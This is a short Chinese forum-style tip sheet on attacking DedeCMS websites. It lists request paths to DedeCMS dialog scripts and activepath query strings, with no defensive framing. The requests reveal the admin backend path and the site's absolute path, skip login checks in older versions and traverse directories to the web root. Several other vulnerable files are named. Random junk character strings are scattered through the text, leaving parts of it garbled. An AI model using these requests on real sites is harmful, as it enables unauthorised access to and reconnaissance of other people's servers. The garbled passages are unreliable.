dedecms爆后台文件技巧

admin

1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理

6 m$ L+ F& U: _% J9 u员帐号,新版本的就直接转向了后台.

/ Z0 A" C5 T+ K% B2.include/dialog/config.php会爆出后台管理路径
& l- H' D& I  d# v1 T
" c$ C2 G3 G+ M# |2 t. |1 Q3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
' G4 y! U0 X( l' b+ j
) c. j3 H8 z4 ~/ ^4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
* i. F" q/ u& }$ E& T" Q* t- R4 G
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
8 I/ ~/ r! C/ i! R5 x) i, O& l# N
到根目录去.不过这些版本的访问地址有些不同.
) c. {5 c1 z2 E: O. B地址为require/dialog/select_soft.php?activepath=/././././././././

# z' y; ~$ [6 M& P" M8 x% Tinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
存在相同问题的文件还有
! v0 s) G. [+ {: E" }include\dialog\select_images.php
include\dialog\select_media.php
8 z4 I: e6 P, p2 h* \. R# tinclude\dialog\select_templets.php​
3 T) x1 |( E- x8 W